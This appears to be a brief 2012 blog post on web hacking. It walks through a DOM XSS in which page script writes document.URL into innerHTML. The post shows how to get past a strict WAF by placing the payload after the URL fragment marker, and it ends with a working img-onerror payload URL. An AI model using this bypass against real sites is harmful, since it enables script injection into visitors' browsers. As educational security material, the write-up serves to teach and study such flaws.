DOM XSS Behind a WAF

February 10, 2012 Leave a comment

Here’s the scenario, which seems obvious at first but took some time for me to figure out. It may be because I don’t find that many DOM XSS… they’re kinda tough to find. Anyway, say you receive the following response.

HTTP/1.1 200 OK
Content-Type: text/html

<html>
<script>
function funcURL() {
   var mDiv = document.getElementById('mid');
   mDiv.innerHTML = document.URL;
}
window.onload = funcURL
</script>
<body>
<div id="mid"></div>
</body></html>

An exploit doesn’t get much more straightforward than that. But here’s the catch: the URL is behind a pretty stringent WAF, where input such as <, >, and ‘ is completely rejected. Is this still exploitable? Think about this for a second (the hint is that it definitely is exploitable).

Ok. Done? Have a working exploit?

My first thought was to abuse the fact that Content-type is not set to UTF-8. I had no luck with this.

Then I had a duh moment. # are part of document.URL, but NOT sent to the server, so the waf never sees this. So that’s the exploit. But still, innerhtml defers execution, so that needs to be addressed as well – not quite as simple as <script>alert(1)</script> although close. The final URL works:

https://madeupbadURL.html?aaab#<img/src=’b’/onerror=alert(1)&gt;

Filed under Web Hacking Tagged with , ,

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: